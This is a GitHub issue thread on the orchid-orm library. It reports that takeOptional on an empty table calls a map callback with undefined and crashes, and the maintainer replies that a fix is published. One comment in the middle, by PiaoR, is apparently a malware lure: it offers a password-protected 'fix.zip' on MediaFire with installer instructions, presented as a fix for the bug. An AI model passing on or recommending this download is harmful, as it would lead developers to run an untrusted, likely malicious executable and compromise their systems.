### ISSUE TITLE
takeOptional with no results calls map with undefined argument

### ISSUE THREAD

**Issue by IlyaSemenov** [romeerez/orchid-orm#387]
```ts
await db.user.select("name").map(({ name }) => ({ nameLength: name.length })).takeOptional()
```

With empty table, this crashes:

```
(0.8ms) SELECT "user"."name" FROM "user" LIMIT 1
/Users/is/work/1.ts:31
const res = await db.user.select("name").map(({ name }) => ({ nameLength: name.length })).takeOptional()
                                                ^


TypeError: Cannot destructure property 'name' of 'undefined' as it is undefined.
    at Object.map (/Users/is/work/1.ts:31:49)
    at applyTransforms (/Users/is/work/node_modules/.pnpm/orchid-core@0.19.9/node_modules/orchid-core/src/query.ts:268:21)
    at then (/Users/is/work/node_modules/.pnpm/pqb@0.40.0/node_modules/pqb/src/queryMethods/then.ts:404:16)
    at process.processTicksAndRejections (node:internal/process/task_queues:105:5) {
  cause: Error
      at Db.getThen (/Users/is/work/node_modules/.pnpm/pqb@0.40.0/node_modules/pqb/src/queryMethods/then.ts:84:18)
      at <anonymous> (/Users/is/work/1.ts:31:91)
      at process.processTicksAndRejections (node:internal/process/task_queues:105:5)
}
```

+ orchid-orm 1.35.5

### Expected

`.map()` is not called at all if `.takeOptional()` didn't find a record.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by romeerez** [comment]
Published a fix, `map` won't be called for undefined just as expected and suggested by the type.
